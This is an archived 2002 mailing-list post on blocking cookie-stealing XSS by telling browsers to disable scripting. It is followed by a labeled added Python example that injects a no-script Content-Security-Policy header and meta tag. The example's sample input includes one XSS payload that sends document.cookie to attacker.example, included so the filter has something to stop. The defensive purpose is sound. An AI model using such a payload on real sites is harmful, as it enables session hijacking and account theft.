Re: A technique to mitigate cookie-stealing XSS attacks

From: David Wagner (dawat_private)
Date: Thu Nov 07 2002 - 20:23:56 PST

Florian Weimer wrote:
>What about HTTP headers which advise user agents to disable some
>features, e.g. read/write access to the document or parts of it via
>scripting or other Internet Explorer interfaces?

HTTP headers are arguably the wrong place, but it might make sense to
have a <NOSCRIPTS> tag that would require the browser to turn off all
scripting for the entire HTML document, or somesuch.  For instance,
application-layer proxies could add such a tag to all data crossing the
firewall, and places like Hotmail could prepend such a tag to all HTML-formatted
email they receive before displaying it to the user.  Of course, we would
have to trust browsers to respect such a tag, but it could potentially
give a very simple, high-assurance way to turn off dangerous features.
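The two delivery points discussed above (an HTTP header advising the user agent, per Weimer, and an in-document marker prepended by a proxy or by a webmail front end, per Wagner) both exist today in a mechanism this 2002 thread predates: the Content-Security-Policy response header, which can also be carried by a `<meta http-equiv>` element. The filter below is an added example, not code from the post or from any of the products it names; it implements the "application-layer proxy adds a turn-scripting-off marker to everything it passes" idea with that mechanism, and includes a small checker for the header value. The sample response and the `attacker.example` URL are constructed for the example.

```python
# Added example (not from the original post): an application-layer response
# filter that forces "no scripting" onto untrusted HTML, delivered two ways:
#   * as a Content-Security-Policy HTTP header (the header approach quoted
#     from Weimer), and
#   * as a <meta http-equiv="Content-Security-Policy"> element at the top of
#     <head> (the in-document marker Wagner's <NOSCRIPTS> idea points at).
# All sample input below is constructed for the example.
import re

# No script execution from any source, no plugins, no <base> hijacking.
# 'unsafe-inline' is deliberately absent, so inline <script> blocks and on*
# handlers injected by an XSS are refused as well.
NO_SCRIPT_POLICY = "script-src 'none'; object-src 'none'; base-uri 'none'"

_HEAD_RE = re.compile(r"<head\b[^>]*>", re.IGNORECASE)
_HTML_RE = re.compile(r"<html\b[^>]*>", re.IGNORECASE)


def _is_html(headers):
    ctype = headers.get("Content-Type", "")
    return ctype.split(";", 1)[0].strip().lower() == "text/html"


def add_policy_header(headers):
    """Return a copy of HEADERS with the no-script policy appended.

    CSP permits several policies per response (comma-separated or repeated
    fields) and the browser enforces every one of them, so appending a
    policy can only tighten what the upstream server already sent.  Non-HTML
    responses are returned unchanged.
    """
    out = dict(headers)
    if not _is_html(out):
        return out
    existing = out.get("Content-Security-Policy")
    out["Content-Security-Policy"] = (
        f"{existing}, {NO_SCRIPT_POLICY}" if existing else NO_SCRIPT_POLICY
    )
    return out


def add_policy_meta(body):
    """Insert the policy as a <meta http-equiv> element.

    This is the in-document form, usable when the filter cannot set response
    headers.  Caveat: a meta policy governs only markup parsed after it, so
    it must precede any attacker-controlled content; it goes at the very
    start of <head>, which is created if missing.  The meta form also cannot
    carry frame-ancestors, sandbox or report-uri directives.
    """
    meta = f'<meta http-equiv="Content-Security-Policy" content="{NO_SCRIPT_POLICY}">'
    m = _HEAD_RE.search(body)
    if m:
        return body[:m.end()] + meta + body[m.end():]
    m = _HTML_RE.search(body)
    if m:
        return body[:m.end()] + "<head>" + meta + "</head>" + body[m.end():]
    return "<head>" + meta + "</head>" + body


def policy_forbids_scripts(header_value):
    """True if any policy in a CSP header value denies every script source
    (script-src 'none', or default-src 'none' with no script-src override).
    Since every policy must pass, one such policy is sufficient."""
    for policy in header_value.split(","):
        directives = {}
        for directive in policy.split(";"):
            parts = directive.strip().split()
            if parts:
                directives[parts[0].lower()] = [p.lower() for p in parts[1:]]
        src = directives.get("script-src", directives.get("default-src"))
        if src == ["'none'"]:
            return True
    return False


def filter_response(headers, body):
    """What the proxy does to one response: header plus in-document policy."""
    new_headers = add_policy_header(headers)
    if _is_html(new_headers):
        body = add_policy_meta(body)
    return new_headers, body


if __name__ == "__main__":
    # Constructed sample: HTML mail with a cookie-stealing payload, served by
    # an upstream that already set a policy too permissive to stop it.
    hdrs = {"Content-Type": "text/html; charset=utf-8",
            "Content-Security-Policy": "script-src 'self' 'unsafe-inline'"}
    html = ("<html><head><title>mail</title></head><body>"
            "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
            "</body></html>")
    h, b = filter_response(hdrs, html)
    print(h["Content-Security-Policy"])
    print("scripts blocked:", policy_forbids_scripts(h["Content-Security-Policy"]))
    print(b[:140])
```

The filter never tries to find or remove the injected `<script>`; as in the post's proposal, it only adds a marker and relies on the browser to honour it, which is what makes the approach simple and, for browsers that implement the policy, high-assurance.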

This archive was generated by hypermail 2b30 : Fri Nov 08 2002 - 20:14:13 PST